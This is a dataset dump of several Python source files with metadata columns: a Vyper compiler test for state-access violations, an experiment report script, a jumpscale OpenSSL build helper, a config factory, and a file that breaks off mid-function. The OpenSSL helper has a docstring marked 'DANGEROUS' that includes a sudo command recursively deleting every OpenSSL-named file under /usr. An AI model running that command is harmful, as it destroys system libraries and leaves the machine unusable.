max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
tests/parser/exceptions/test_constancy_exception.py
|
upgradvisor/vyper
| 1,347
|
6628051
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import ImmutableViolation, StateAccessViolation
@pytest.mark.parametrize(
"bad_code",
[
"""
x: int128
@external
@view
def foo() -> int128:
self.x = 5
return 1""",
"""
@external
@view
def foo() -> int128:
send(0x1234567890123456789012345678901234567890, 5)
return 1""",
"""
@external
@view
def foo():
selfdestruct(0x1234567890123456789012345678901234567890)""",
"""
x: int128
y: int128
@external
@view
def foo() -> int128:
self.y = 9
return 5""",
"""
@external
@view
def foo() -> int128:
x: Bytes[4] = raw_call(
0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9
)
return 5""",
"""
@external
@view
def foo() -> int128:
x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9)
return 5""",
# test constancy in range expressions
"""
glob: int128
@internal
def foo() -> int128:
self.glob += 1
return 5
@external
def bar():
for i in range(self.foo(), self.foo() + 1):
pass""",
"""
glob: int128
@internal
def foo() -> int128:
self.glob += 1
return 5
@external
def bar():
for i in [1,2,3,4,self.foo()]:
pass""",
"""
@external
def foo():
x: int128 = 5
for i in range(x):
pass""",
"""
f:int128
@external
def a (x:int128):
self.f = 100
@view
@external
def b():
self.a(10)""",
],
)
def test_statefulness_violations(bad_code):
with raises(StateAccessViolation):
compiler.compile_code(bad_code)
@pytest.mark.parametrize(
"bad_code",
[
"""
@external
def foo(x: int128):
x = 5""",
],
)
def test_immutability_violations(bad_code):
with raises(ImmutableViolation):
compiler.compile_code(bad_code)
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import ImmutableViolation, StateAccessViolation
@pytest.mark.parametrize(
"bad_code",
[
"""
x: int128
@external
@view
def foo() -> int128:
self.x = 5
return 1""",
"""
@external
@view
def foo() -> int128:
send(0x1234567890123456789012345678901234567890, 5)
return 1""",
"""
@external
@view
def foo():
selfdestruct(0x1234567890123456789012345678901234567890)""",
"""
x: int128
y: int128
@external
@view
def foo() -> int128:
self.y = 9
return 5""",
"""
@external
@view
def foo() -> int128:
x: Bytes[4] = raw_call(
0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9
)
return 5""",
"""
@external
@view
def foo() -> int128:
x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9)
return 5""",
# test constancy in range expressions
"""
glob: int128
@internal
def foo() -> int128:
self.glob += 1
return 5
@external
def bar():
for i in range(self.foo(), self.foo() + 1):
pass""",
"""
glob: int128
@internal
def foo() -> int128:
self.glob += 1
return 5
@external
def bar():
for i in [1,2,3,4,self.foo()]:
pass""",
"""
@external
def foo():
x: int128 = 5
for i in range(x):
pass""",
"""
f:int128
@external
def a (x:int128):
self.f = 100
@view
@external
def b():
self.a(10)""",
],
)
def test_statefulness_violations(bad_code):
with raises(StateAccessViolation):
compiler.compile_code(bad_code)
@pytest.mark.parametrize(
"bad_code",
[
"""
@external
def foo(x: int128):
x = 5""",
],
)
def test_immutability_violations(bad_code):
with raises(ImmutableViolation):
compiler.compile_code(bad_code)
|
en
| 0.476243
|
x: int128 @external @view def foo() -> int128: self.x = 5 return 1 @external @view def foo() -> int128: send(0x1234567890123456789012345678901234567890, 5) return 1 @external @view def foo(): selfdestruct(0x1234567890123456789012345678901234567890) x: int128 y: int128 @external @view def foo() -> int128: self.y = 9 return 5 @external @view def foo() -> int128: x: Bytes[4] = raw_call( 0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9 ) return 5 @external @view def foo() -> int128: x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9) return 5 # test constancy in range expressions glob: int128 @internal def foo() -> int128: self.glob += 1 return 5 @external def bar(): for i in range(self.foo(), self.foo() + 1): pass glob: int128 @internal def foo() -> int128: self.glob += 1 return 5 @external def bar(): for i in [1,2,3,4,self.foo()]: pass @external def foo(): x: int128 = 5 for i in range(x): pass f:int128 @external def a (x:int128): self.f = 100 @view @external def b(): self.a(10) @external def foo(x: int128): x = 5
| 2.366375
| 2
|
omnilearn/op/report.py
|
GiuliaLanzillotta/omni-learn
| 0
|
6628052
|
import sys, os
try:
from tqdm import tqdm
except ImportError:
tqdm = None
from tabulate import tabulate
import humpack as hp
import omnifig as fig
FD_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
DEFAULT_SAVE_PATH = os.path.join(os.path.dirname(FD_PATH), 'trained_nets')
def collect_info(run):
info = {
'end': run.A['training']['step_limit'],
'date': run.records['timestamp'],
'steps': run.records['total_steps'],
'val_loss': run.records['stats']['val'][-1]['loss']['avg']
if 'val' in run.records['stats']
and len(run.records['stats']['val'])
and 'loss' in run.records['stats']['val']
else None,
}
run.info = info
# for k,v in info.items():
# setattr(run, k, v)
# return info
#
# @fig.Script('report', description='compile a report of past runs')
def get_report(A):
root = A.pull('saveroot', '<>root', None)
if root is None:
root = os.environ['OMNILEARN_SAVE_DIR'] if 'OMNILEARN_SAVE_DIR' in os.environ else DEFAULT_SAVE_PATH
# print(root)
if root is None:
raise Exception('no saveroot found')
pbar = A.pull('pbar', True)
if tqdm is None:
pbar = None
names = os.listdir(root)
# region Load Runs
A.push('silent', True, overwrite=False)
A.push('_type', A.pull('run_type', 'run'), overwrite=False)
runs = hp.Table()
print(f'Found {len(names)} runs')
itr = tqdm(names) if pbar else iter(names)
with A.silenced():
for name in itr:
C = fig.get_config()
C.update(A)
C.push('path', os.path.join(root, name))
run = C.pull_self()
runs.append(run)
# endregion
runs.map(collect_info)
runs = sorted(runs, key=lambda run: run.info['date'], reverse=True)
limit = A.pull('limit', None)
if limit is not None:
runs = runs[:limit]
return runs
|
import sys, os
try:
from tqdm import tqdm
except ImportError:
tqdm = None
from tabulate import tabulate
import humpack as hp
import omnifig as fig
FD_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
DEFAULT_SAVE_PATH = os.path.join(os.path.dirname(FD_PATH), 'trained_nets')
def collect_info(run):
info = {
'end': run.A['training']['step_limit'],
'date': run.records['timestamp'],
'steps': run.records['total_steps'],
'val_loss': run.records['stats']['val'][-1]['loss']['avg']
if 'val' in run.records['stats']
and len(run.records['stats']['val'])
and 'loss' in run.records['stats']['val']
else None,
}
run.info = info
# for k,v in info.items():
# setattr(run, k, v)
# return info
#
# @fig.Script('report', description='compile a report of past runs')
def get_report(A):
root = A.pull('saveroot', '<>root', None)
if root is None:
root = os.environ['OMNILEARN_SAVE_DIR'] if 'OMNILEARN_SAVE_DIR' in os.environ else DEFAULT_SAVE_PATH
# print(root)
if root is None:
raise Exception('no saveroot found')
pbar = A.pull('pbar', True)
if tqdm is None:
pbar = None
names = os.listdir(root)
# region Load Runs
A.push('silent', True, overwrite=False)
A.push('_type', A.pull('run_type', 'run'), overwrite=False)
runs = hp.Table()
print(f'Found {len(names)} runs')
itr = tqdm(names) if pbar else iter(names)
with A.silenced():
for name in itr:
C = fig.get_config()
C.update(A)
C.push('path', os.path.join(root, name))
run = C.pull_self()
runs.append(run)
# endregion
runs.map(collect_info)
runs = sorted(runs, key=lambda run: run.info['date'], reverse=True)
limit = A.pull('limit', None)
if limit is not None:
runs = runs[:limit]
return runs
|
en
| 0.439492
|
# for k,v in info.items(): # setattr(run, k, v) # return info # # @fig.Script('report', description='compile a report of past runs') # print(root) # region Load Runs # endregion
| 2.110175
| 2
|
modules/lib/PrefabOpenSSL.py
|
threefoldtech/jumpscale_prefab9
| 0
|
6628053
|
from jumpscale import j
base = j.tools.prefab._getBaseClass()
# DANGEROUS
# HIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_
sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_
sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_
sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_
sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_
sudo mv -f /usr/local/ssl /usr/local/ssl_
sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_
sudo mv -f /usr/bin/openssl /usr/bin/openssl_
find /usr -name "*openssl*" -exec rm -rf {} \;
"""
# UNHIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl
sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl
sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl
sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl
sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl
sudo mv -f /usr/local/ssl_ /usr/local/ssl
sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl
sudo mv -f /usr/bin/openssl_ /usr/bin/openssl
"""
class PrefabOpenSSL(base):
def _init(self):
self.BUILDDIRL = self.core.replace("$BUILDDIR/openssl")
self.CODEDIRL = self.core.replace("$BUILDDIR/code/openssl")
def reset(self):
base.reset(self)
self.core.dir_remove(self.BUILDDIRL)
self.core.dir_remove(self.CODEDIRL)
def build(self, reset=False):
"""
js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)'
"""
if self.doneCheck("build") and not reset:
return
self.prefab.system.base.development(python=False)
url = "https://github.com/openssl/openssl.git"
self.prefab.tools.git.pullRepo(url, branch="OpenSSL_1_1_0-stable",dest=self.CODEDIRL, reset=False, ssh=False)
if not self.doneGet("compile") or reset:
C = """
set -ex
mkdir -p $BUILDDIRL
cd $CODEDIRL
# ./config
./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL
make depend
make install
rm -rf $BUILDDIRL/share
rm -rf $BUILDDIRL/private
echo "**BUILD DONE**"
"""
if self.prefab.core.isMac:
C = C.replace("$target", "darwin64-x86_64-cc")
else:
C = C.replace("$target", "linux-generic64")
self.prefab.core.file_write("%s/mycompile_all.sh" % self.CODEDIRL, self.replace(C))
self.logger.info("compile openssl")
self.logger.debug(C)
self.prefab.core.run("sh %s/mycompile_all.sh" % self.CODEDIRL)
self.doneSet("compile")
self.logger.info("BUILD DONE")
else:
self.logger.info("NO NEED TO BUILD")
self.logger.info("BUILD COMPLETED OK")
self.doneSet("build")
|
from jumpscale import j
base = j.tools.prefab._getBaseClass()
# DANGEROUS
# HIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_
sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_
sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_
sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_
sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_
sudo mv -f /usr/local/ssl /usr/local/ssl_
sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_
sudo mv -f /usr/bin/openssl /usr/bin/openssl_
find /usr -name "*openssl*" -exec rm -rf {} \;
"""
# UNHIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl
sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl
sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl
sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl
sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl
sudo mv -f /usr/local/ssl_ /usr/local/ssl
sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl
sudo mv -f /usr/bin/openssl_ /usr/bin/openssl
"""
class PrefabOpenSSL(base):
def _init(self):
self.BUILDDIRL = self.core.replace("$BUILDDIR/openssl")
self.CODEDIRL = self.core.replace("$BUILDDIR/code/openssl")
def reset(self):
base.reset(self)
self.core.dir_remove(self.BUILDDIRL)
self.core.dir_remove(self.CODEDIRL)
def build(self, reset=False):
"""
js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)'
"""
if self.doneCheck("build") and not reset:
return
self.prefab.system.base.development(python=False)
url = "https://github.com/openssl/openssl.git"
self.prefab.tools.git.pullRepo(url, branch="OpenSSL_1_1_0-stable",dest=self.CODEDIRL, reset=False, ssh=False)
if not self.doneGet("compile") or reset:
C = """
set -ex
mkdir -p $BUILDDIRL
cd $CODEDIRL
# ./config
./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL
make depend
make install
rm -rf $BUILDDIRL/share
rm -rf $BUILDDIRL/private
echo "**BUILD DONE**"
"""
if self.prefab.core.isMac:
C = C.replace("$target", "darwin64-x86_64-cc")
else:
C = C.replace("$target", "linux-generic64")
self.prefab.core.file_write("%s/mycompile_all.sh" % self.CODEDIRL, self.replace(C))
self.logger.info("compile openssl")
self.logger.debug(C)
self.prefab.core.run("sh %s/mycompile_all.sh" % self.CODEDIRL)
self.doneSet("compile")
self.logger.info("BUILD DONE")
else:
self.logger.info("NO NEED TO BUILD")
self.logger.info("BUILD COMPLETED OK")
self.doneSet("build")
|
en
| 0.259497
|
# DANGEROUS # HIDE OPENSSL sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_ sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_ sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_ sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_ sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_ sudo mv -f /usr/local/ssl /usr/local/ssl_ sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_ sudo mv -f /usr/bin/openssl /usr/bin/openssl_ find /usr -name "*openssl*" -exec rm -rf {} \; # UNHIDE OPENSSL sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl sudo mv -f /usr/local/ssl_ /usr/local/ssl sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl sudo mv -f /usr/bin/openssl_ /usr/bin/openssl js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)' set -ex mkdir -p $BUILDDIRL cd $CODEDIRL # ./config ./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL make depend make install rm -rf $BUILDDIRL/share rm -rf $BUILDDIRL/private echo "**BUILD DONE**"
| 1.883569
| 2
|
scooch/config_factory.py
|
PandoraMedia/scooch
| 6
|
6628054
|
<filename>scooch/config_factory.py
# coding=utf-8
# Copyright 2021 Pandora Media, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Python standard library imports
import re
import textwrap
# Third party imports
from ruamel.yaml.comments import CommentedMap
# Local imports
from .config_list import ConfigList
from .config_collection import ConfigCollection
class ConfigFactory(object):
"""
A class for making configurations for class hierarchies out of the box.
"""
def __init__(self, interactive) -> None:
"""
**Constructor**
Args:
interactive: bool - Whether to prompt user for input when constructing a configuration.
"""
super().__init__()
self._interactive = interactive
def create_config(self, cls, level=0):
"""
Generates a configuration for this configurable, with all default values filled out,
comments in place, and sub-configurables selected by the user (or placeholders are
inserted).
Args:
cls: Configurable - A Configurable class to construct a configuration for.
level: int - How many layers deep in a configuration heirarchy we are. This can help with
printing prompts in interactive mode.
Returns:
Config - The constructed configurable with placeholders where no defaults exist.
"""
config = CommentedMap()
if self._interactive:
print(textwrap.indent(f'===\nConfiguring Configurable: {cls.__name__}\n===\n', ' '*level))
# Add defaults
config.update(cls.__PARAM_DEFAULTS__)
# Add configurables
for param, cfgrble_type in cls.__CONFIGURABLES__.items():
docs = cls.__PARAMS__[param]
config[param] = self._populate_config(cfgrble_type, docs, level+1)
# Add required parameters and comments
for ky, val in cls.__PARAMS__.items():
if ky not in config.keys():
if re.match("\<([^>]+)\>", val):
typestr = re.match("\<([^>]+)\>", val).group(1)
config[ky] = f'<{typestr}>'
else:
config[ky] = '<Unspecified Type>'
config.yaml_add_eol_comment('<= '+val, ky, 65)
return {cls.__name__: config}
def _get_subconfig(self, c_type, docs, level):
"""
Configure a sub configurable configuration, optionally with user prompts for types.
Args:
c_type: Configurable - The Configurable to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subclss = c_type._all_subclasses()
if len(subclss) == 1:
return self.create_config(subclss[0], level + 1)
else:
if self._interactive:
inputting = True
while inputting:
subcls_names = [f'{idx}: {subcls.__name__}' for idx, subcls in enumerate(subclss)]
print(textwrap.indent(f'Select Subclass for Component of Type "{c_type.__name__}":\n-\n{formatted_docs}\n-\n' + '\n'.join(subcls_names), ' '*level + '+ '))
try:
selection = int(input(' '*level + '+ '))
if selection < 0: raise IndexError # Prevent negative indexing in UI.
print(' ')
inputting = False
return self.create_config(subclss[selection], level + 1)
except (ValueError, IndexError):
print(textwrap.indent(f'Invalid value, please enter an integer from 0 to {len(subclss)-1}', ' '*level))
print(' ')
else:
return {f'<{c_type.__name__}>': None}
def _unpack_config_list(self, c_type, docs, level):
"""
Configure a list of sub configurable configurations, optionally with user prompts
for types.
Args:
c_type: Configurable - The Configurable to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subtype = c_type.subtype
if type(subtype) in (ConfigList, ConfigCollection):
subtype_name = subtype.__class__.__name__
else:
subtype_name = subtype.__name__
if self._interactive:
inputting = True
while inputting:
print(textwrap.indent(f'Choose number of elements in Config List of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
try:
number_elem = int(input(' '*level + '+ '))
if number_elem < 0: raise ValueError
print(' ')
inputting = False
except ValueError:
print(textwrap.indent(f'Invalid value, please enter a positive integer', ' '*level))
print(' ')
cfg = []
for _ in range(number_elem):
if type(subtype) not in (ConfigList, ConfigCollection):
docs = ''
cfg += [self._populate_config(subtype, docs, level+1)]
return cfg
def _unpack_config_collection(self, c_type, docs, level):
"""
Configure a collection of sub configurable configurations, optionally with user prompts
for types.
Args:
c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subtype = c_type.subtype
if type(subtype) in (ConfigList, ConfigCollection):
subtype_name = subtype.__class__.__name__
else:
subtype_name = subtype.__name__
if self._interactive:
inputting = True
cfg = {}
while inputting:
print(textwrap.indent(f'Creating a collection of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
print(textwrap.indent(f'Choose a name for an element in collection of type "{subtype_name}", \nor press enter to finish generating this collection:', ' '*level + '+ '))
name = input(' '*level + '+ ')
print(' ')
if len(name) == 0 or name.isspace():
inputting = False
else:
if type(subtype) not in (ConfigList, ConfigCollection):
docs = ''
cfg[name] = self._populate_config(subtype, docs, level+1)
return cfg
def _populate_config(self, cfgrble_type, docs, lvl):
"""
A hub function to distribute the configuration construction to the correct handler, based on the type
of configuration required.
Args:
cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed.
docs: str - The docs describing the configuration to be constructed.
lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.
"""
if type(cfgrble_type) is ConfigList:
value = self._unpack_config_list(cfgrble_type, docs, lvl)
elif type(cfgrble_type) is ConfigCollection:
value = self._unpack_config_collection(cfgrble_type, docs, lvl)
else:
value = self._get_subconfig(cfgrble_type, docs, lvl)
return value
|
<filename>scooch/config_factory.py
# coding=utf-8
# Copyright 2021 Pandora Media, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Python standard library imports
import re
import textwrap
# Third party imports
from ruamel.yaml.comments import CommentedMap
# Local imports
from .config_list import ConfigList
from .config_collection import ConfigCollection
class ConfigFactory(object):
"""
A class for making configurations for class hierarchies out of the box.
"""
def __init__(self, interactive) -> None:
"""
**Constructor**
Args:
interactive: bool - Whether to prompt user for input when constructing a configuration.
"""
super().__init__()
self._interactive = interactive
def create_config(self, cls, level=0):
"""
Generates a configuration for this configurable, with all default values filled out,
comments in place, and sub-configurables selected by the user (or placeholders are
inserted).
Args:
cls: Configurable - A Configurable class to construct a configuration for.
level: int - How many layers deep in a configuration heirarchy we are. This can help with
printing prompts in interactive mode.
Returns:
Config - The constructed configurable with placeholders where no defaults exist.
"""
config = CommentedMap()
if self._interactive:
print(textwrap.indent(f'===\nConfiguring Configurable: {cls.__name__}\n===\n', ' '*level))
# Add defaults
config.update(cls.__PARAM_DEFAULTS__)
# Add configurables
for param, cfgrble_type in cls.__CONFIGURABLES__.items():
docs = cls.__PARAMS__[param]
config[param] = self._populate_config(cfgrble_type, docs, level+1)
# Add required parameters and comments
for ky, val in cls.__PARAMS__.items():
if ky not in config.keys():
if re.match("\<([^>]+)\>", val):
typestr = re.match("\<([^>]+)\>", val).group(1)
config[ky] = f'<{typestr}>'
else:
config[ky] = '<Unspecified Type>'
config.yaml_add_eol_comment('<= '+val, ky, 65)
return {cls.__name__: config}
def _get_subconfig(self, c_type, docs, level):
"""
Configure a sub configurable configuration, optionally with user prompts for types.
Args:
c_type: Configurable - The Configurable to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subclss = c_type._all_subclasses()
if len(subclss) == 1:
return self.create_config(subclss[0], level + 1)
else:
if self._interactive:
inputting = True
while inputting:
subcls_names = [f'{idx}: {subcls.__name__}' for idx, subcls in enumerate(subclss)]
print(textwrap.indent(f'Select Subclass for Component of Type "{c_type.__name__}":\n-\n{formatted_docs}\n-\n' + '\n'.join(subcls_names), ' '*level + '+ '))
try:
selection = int(input(' '*level + '+ '))
if selection < 0: raise IndexError # Prevent negative indexing in UI.
print(' ')
inputting = False
return self.create_config(subclss[selection], level + 1)
except (ValueError, IndexError):
print(textwrap.indent(f'Invalid value, please enter an integer from 0 to {len(subclss)-1}', ' '*level))
print(' ')
else:
return {f'<{c_type.__name__}>': None}
def _unpack_config_list(self, c_type, docs, level):
"""
Configure a list of sub configurable configurations, optionally with user prompts
for types.
Args:
c_type: Configurable - The Configurable to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subtype = c_type.subtype
if type(subtype) in (ConfigList, ConfigCollection):
subtype_name = subtype.__class__.__name__
else:
subtype_name = subtype.__name__
if self._interactive:
inputting = True
while inputting:
print(textwrap.indent(f'Choose number of elements in Config List of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
try:
number_elem = int(input(' '*level + '+ '))
if number_elem < 0: raise ValueError
print(' ')
inputting = False
except ValueError:
print(textwrap.indent(f'Invalid value, please enter a positive integer', ' '*level))
print(' ')
cfg = []
for _ in range(number_elem):
if type(subtype) not in (ConfigList, ConfigCollection):
docs = ''
cfg += [self._populate_config(subtype, docs, level+1)]
return cfg
def _unpack_config_collection(self, c_type, docs, level):
"""
Configure a collection of sub configurable configurations, optionally with user prompts
for types.
Args:
c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for.
docs: str - The docs to print out in user prompts to explain the config purpose to
the user.
level: int - How many layers deep in a configuration heirarchy we are. This can
help with printing prompts in interactive mode.
Returns:
dict - A dictionary containing the constructed configuration
"""
formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
subtype = c_type.subtype
if type(subtype) in (ConfigList, ConfigCollection):
subtype_name = subtype.__class__.__name__
else:
subtype_name = subtype.__name__
if self._interactive:
inputting = True
cfg = {}
while inputting:
print(textwrap.indent(f'Creating a collection of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
print(textwrap.indent(f'Choose a name for an element in collection of type "{subtype_name}", \nor press enter to finish generating this collection:', ' '*level + '+ '))
name = input(' '*level + '+ ')
print(' ')
if len(name) == 0 or name.isspace():
inputting = False
else:
if type(subtype) not in (ConfigList, ConfigCollection):
docs = ''
cfg[name] = self._populate_config(subtype, docs, level+1)
return cfg
def _populate_config(self, cfgrble_type, docs, lvl):
"""
A hub function to distribute the configuration construction to the correct handler, based on the type
of configuration required.
Args:
cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed.
docs: str - The docs describing the configuration to be constructed.
lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.
"""
if type(cfgrble_type) is ConfigList:
value = self._unpack_config_list(cfgrble_type, docs, lvl)
elif type(cfgrble_type) is ConfigCollection:
value = self._unpack_config_collection(cfgrble_type, docs, lvl)
else:
value = self._get_subconfig(cfgrble_type, docs, lvl)
return value
|
en
| 0.763474
|
# coding=utf-8 # Copyright 2021 Pandora Media, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Python standard library imports # Third party imports # Local imports A class for making configurations for class hierarchies out of the box. **Constructor** Args: interactive: bool - Whether to prompt user for input when constructing a configuration. Generates a configuration for this configurable, with all default values filled out, comments in place, and sub-configurables selected by the user (or placeholders are inserted). Args: cls: Configurable - A Configurable class to construct a configuration for. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: Config - The constructed configurable with placeholders where no defaults exist. # Add defaults # Add configurables # Add required parameters and comments Configure a sub configurable configuration, optionally with user prompts for types. Args: c_type: Configurable - The Configurable to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration # Prevent negative indexing in UI. Configure a list of sub configurable configurations, optionally with user prompts for types. Args: c_type: Configurable - The Configurable to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration Configure a collection of sub configurable configurations, optionally with user prompts for types. Args: c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration A hub function to distribute the configuration construction to the correct handler, based on the type of configuration required. Args: cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed. docs: str - The docs describing the configuration to be constructed. lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.
| 2.266457
| 2
|
src/autoks/core/model_selection/boms_model_selector.py
|
lschlessinger1/MS-project
| 2
|
6628055
|
from typing import List, Callable, Optional, Union
from src.autoks.backend.model import RawGPModelType
from src.autoks.callbacks import CallbackList
from src.autoks.core.covariance import Covariance
from src.autoks.core.gp_model_population import GPModelPopulation
from src.autoks.core.grammar import BomsGrammar
from src.autoks.core.hyperprior import boms_hyperpriors
from src.autoks.core.model_selection.base import ModelSelector
class BomsModelSelector(ModelSelector):
def __init__(self,
grammar: Optional[BomsGrammar] = None,
base_kernel_names: Optional[List[str]] = None,
fitness_fn: Union[str, Callable[[RawGPModelType], float]] = 'loglikn',
n_parents: int = 1,
additive_form: bool = False,
gp_fn: Union[str, Callable] = 'gp_regression',
gp_args: Optional[dict] = None,
optimizer: Optional[str] = None,
n_restarts_optimizer: int = 3):
if grammar is None:
hyperpriors = boms_hyperpriors()
